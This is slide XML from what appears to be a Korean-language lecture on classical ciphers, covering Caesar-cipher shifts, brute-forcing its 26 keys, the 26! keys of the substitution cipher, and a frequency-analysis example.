                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>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bl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>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80768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D0C1BC5A-6C74-4D83-ACDE-B41F38D7A407}"/>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12" name="TextBox 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FED98565-DD5C-47B2-9C81-EE5918146ECC}"/>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13" name="직선 화살표 연결선 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E63028D1-6A38-4386-A521-036625C6C851}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11"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전문사관 24기 임관식 괴산에 있는 아들 군대 훈련소 다녀왔습니다. : 네이버 블로그">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2101780-9A11-40BC-B2F2-873BD2D74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761" y="1690688"/>
            <a:ext cx="6655485" cy="4417578"/>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122F1C54-A6A8-4875-B01C-0953677360E1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6166925" y="3629889"/>
            <a:ext cx="314696" cy="843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D14CC1E-EABC-4EB1-815D-10B03818C26B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="481437" y="1690688"/>
            <a:ext cx="2756522" cy="4975672"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30809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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Ceasar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Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{084E3E52-14B5-4D47-8E83-1D9C5B775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440" y="2617876"/>
            <a:ext cx="74676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0621DB74-C5C5-45D7-94E3-2096FB042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825" y="4199482"/>
            <a:ext cx="2854030" cy="120362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직선 연결선 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BC2726C-35D9-4E37-AB8D-49FC6A277CE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2676787" y="2486258"/>
            <a:ext cx="0" cy="328982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08CABBC-A2B1-4C69-B775-B0FF45CDFD24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1210190" y="2564004"/>
            <a:ext cx="1272207" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>암호화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sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="TextBox 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{64BD5B46-2EBE-4296-926F-B1C58B1F2182}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1210190" y="4240884"/>
            <a:ext cx="1272207" cy="923330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>복호화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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="20" name="직선 연결선 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76A8C4ED-FA3F-4D86-A278-63F71E33ADD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790492" y="3887840"/>
            <a:ext cx="10899583"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5A13EE6-A0F0-4B46-8D5B-8063D5D88F1C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4325510" y="6123543"/>
            <a:ext cx="3371352"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KHOOR   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>( key </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0">
                <a:sym typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>: 3 )</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dirty="0"/>
              <a:t>평문으로 사용되는 알파벳을 일정한 문자 수 만큼 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>평행이동</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12458277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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
                    <a:lumMod val="65000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>/Ceasar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암호의 크랙</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dirty="0"/>
              <a:t>키의 종류는 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>26</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>가지</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>전사</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>(brute force </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>attack) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>공격이 가능</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="18" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CA58087-6548-48E3-8664-4F32022E8CD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="413447689"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3300386" y="252227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21" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CABD99D2-8B77-4964-9413-505FC2480F06}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="810674328"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6714461" y="252227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39" name="내용 개체 틀 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{07D1D739-0040-45EA-B9E0-FC96FCCF656B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2377411053"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="5754051" y="2527591"/>
          <a:ext cx="373314" cy="3586668"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="373314">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1593522546"/>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pSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="42" name="그룹 41">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25A361D8-B0C6-4347-8C92-BB01B20C0B93}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166956" y="2686639"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="40" name="직선 화살표 연결선 39">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31C1E213-DCA2-4FEA-899B-847785F56CE7}"/>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D1B4D4DD-ECCA-4E22-B317-AEE3112FCBE5}"/>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그룹 44">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{63AD345A-2D1F-4A97-87B5-A6FCC072B44A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166956" y="2971014"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="46" name="직선 화살표 연결선 45">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{270C82C1-3523-4399-A5A9-62B523374592}"/>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FB57D83-2295-4D8F-8440-77A233BC7B0A}"/>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그룹 47">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2556AA4F-4302-49DC-907F-E47D6FF41DB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166956" y="3293096"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="49" name="직선 화살표 연결선 48">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{450109A4-7E9D-4A2F-855C-82A3E7907F65}"/>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39C286E-4C18-4504-A622-DF5EC73748D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id="{78FDB869-7C2D-4C2D-8CAD-284D471902F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166955" y="3586898"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="52" name="직선 화살표 연결선 51">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3BA52078-B998-4699-8F26-C51C89C188AE}"/>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7ACF5AE2-0436-480A-8355-BE565DCC13BF}"/>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그룹 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06BA1347-9919-4876-AE1A-9AEEDBE37803}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5169785" y="3880700"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="55" name="직선 화살표 연결선 54">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{70EDD42F-F6CB-4793-998C-20EF0F25974D}"/>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1AC6CBAE-2455-4981-B676-A6AD461DB4F2}"/>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7" name="그룹 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{82391D9A-BE7E-44C0-8A8C-97050E0838A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166955" y="4183929"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="58" name="직선 화살표 연결선 57">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3B32822A-2C9E-459D-AED6-DDA408A5BAF4}"/>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BBB3A373-A749-41EC-90C4-1A6387AC55AB}"/>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그룹 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AC1D88D-69C2-40DF-A9C2-C4F4DF28A841}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166955" y="5373277"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="61" name="직선 화살표 연결선 60">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{47E61A01-BDA1-41A5-AF93-69F78656E34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4DB924FC-D4A0-4460-B25A-8D922EDEC21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그룹 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6635651D-A014-4F19-83A7-F01AC5526B5C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166955" y="5667079"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="64" name="직선 화살표 연결선 63">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E32ED8C5-AB3B-40C5-907E-4FD4DCA1C63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AA82DFF-DA8C-4521-897E-9507EFD34493}"/>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6" name="그룹 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{174EF234-F01C-48A6-BBBE-662FE1B74C88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5166955" y="5951454"/>
            <a:ext cx="1547505" cy="0"/>
            <a:chOff x="5166956" y="2686639"/>
            <a:chExt cx="1547505" cy="0"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="67" name="직선 화살표 연결선 66">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1BB3252-6765-4305-80CA-0BEBCCF885BF}"/>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AB793A53-851A-4300-87A8-8F8B48429621}"/>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451697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290" name="Picture 2" descr="Python] 단일 치환 암호">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60453566-AB3B-40FD-B663-46330915F0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7757" y="1788785"/>
            <a:ext cx="7580826" cy="328043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93961392-74FC-47BE-B204-55727A129DE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1925325" y="3285282"/>
            <a:ext cx="1272207" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>암호화</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="TextBox 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7C4E9CF-E6F3-4CB9-8D60-5F07EC9982B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1417601" y="3654614"/>
            <a:ext cx="2130156"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TXGGO</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="4" name="직선 연결선 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8458D368-1A0E-49AE-8480-BF5AE2F0D683}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5788058" y="2433932"/>
            <a:ext cx="3280528"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9D03EC99-E87C-43EF-B87D-78AD4877EFC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4949072" y="2433932"/>
            <a:ext cx="524130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D44FC1C0-809A-4C10-8F78-6D69572914BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5505254" y="2433932"/>
            <a:ext cx="137631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9C7D4CBE-55E6-42FA-A6C4-531170CE58B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4119514" y="2433932"/>
            <a:ext cx="361989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0055322E-DDC8-433C-B1A2-8FA66B2833AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2660545" y="5803206"/>
            <a:ext cx="6431011" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0" err="1"/>
              <a:t>시저</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 암호보다 키의 종류가 훨씬 많다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>. -&gt; 26! </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>개</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40760137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Picture 2" descr="양피지 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{509DEE3F-B140-4304-B622-6BEC4B811A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258" y="213357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B59151-DF87-4116-A939-ACDB6FE7F968}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1281259" y="2200143"/>
            <a:ext cx="4007178" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>ME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>LGVIWAME</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>OPIN</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>ZGW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>EGMZRUU</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
